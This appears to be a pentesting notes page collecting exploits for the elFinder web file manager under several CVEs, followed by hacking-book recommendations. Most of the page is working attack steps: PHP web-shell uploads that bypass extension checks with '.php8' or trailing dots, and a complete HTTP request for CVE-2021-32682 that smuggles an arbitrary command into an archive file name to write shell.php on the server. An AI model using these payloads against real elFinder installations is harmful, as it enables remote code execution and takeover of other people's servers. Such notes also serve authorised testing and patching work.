ElFinder
ElFinder Exploits
elFinder is an open-source file manager for web, written in JavaScript using jQuery UI - Ref: https://github.com/Studio-42/elFinder
CVE-2023-52044 - ElFinder 2.1.62 - RCE
Studio-42 eLfinder 2.1.62 is vulnerable to Remote Code Execution (RCE) as there is no restriction for uploading files with the .php8 extension.
Select arbitrary png file to upload
Capture request with Burp and set content as
test<?php phpinfo();?>Set filename like
test.php8After forwarding the request, the file is successfully uploaded under the files directory
CVE-2023-35840 - elFinder < 2.1.62 - Path Traversal
elFinder < 2.6.61 - RCE
Upload a PHP file the contains a payload with a preceding
a, i.e:a<?php <payload>?>.Add two dots after the file name:
shell.php...The shell file is successfully uploaded by bypassing detection and can be accessed via
files/shell.php.
CVE-2022-26960 - LFI
elFinder through 2.1.60 is affected by local file inclusion via connector.minimal.php.
CVE-2021-32682 - RCE
Create a plain text file named 1.txt
Archive this file in the right-click menu to ZIP format, and modify this archived file name to 2.zip:
1.txt and 2.zip are ready here
Then, send the following request to execute arbitrary commands:
GET /php/connector.minimal.php?cmd=archive&name=-TvTT=id>shell.php%20%23%20a.zip&target=l1_Lw&targets%5B1%5D=l1_Mi56aXA&targets%5B0%5D=l1_MS50eHQ&type=application%2Fzip HTTP/1.1
Host: your-ip
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://localhost.lan:8080/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close
In this request, you can see 3 important parameters:
name, its value is equal to-TvTT=id>shell.php # a.zip, you can modify theid>shell.phpto arbitrary commandstargets[0], its value is equal tol1_MS50eHQ.l1means the first storage volume,MS50eHQis the base64 encoded string of1.txttargets[1], its value is equal tol1_Mi56aXA.l1means the first storage volume,Mi56aXAis the base64 encoded string of2.zip
Although this request responeds to an error message, our command has been executed and shell.php has been written to http://your-ip:8080/files/shell.php
CVE-2021-43421 RCE in elFinder <2.1.60
elFinder 2.1.57 RCE
elFinder Web file manager Version: 2.1.53 Remote Command Execution
CVE-2019-9194 - elFinder <= 2.1.47 - Command Injection
Vulnerability in the PHP connector
Interesting Books
Interesting BooksThe Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.
Support this Gitbook
I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.
Last updated